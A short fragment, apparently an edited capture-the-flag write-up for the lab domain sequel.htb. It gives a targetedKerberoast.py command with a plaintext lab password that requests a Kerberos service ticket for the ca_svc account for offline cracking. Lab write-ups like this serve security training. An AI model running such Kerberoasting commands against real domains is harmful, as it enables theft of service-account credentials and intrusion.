Enumeration

 first we have to get the

-hash using kerberoasting technique using targetedKerberoast.py
+ca_svchash using kerberoasting technique using targetedKerberoast.py

 python3 targetedKerberoast.py -v -d sequel.htb -u rose -p KxEPkKe6R8su --request-user ca_svc -o ca_svc.kerb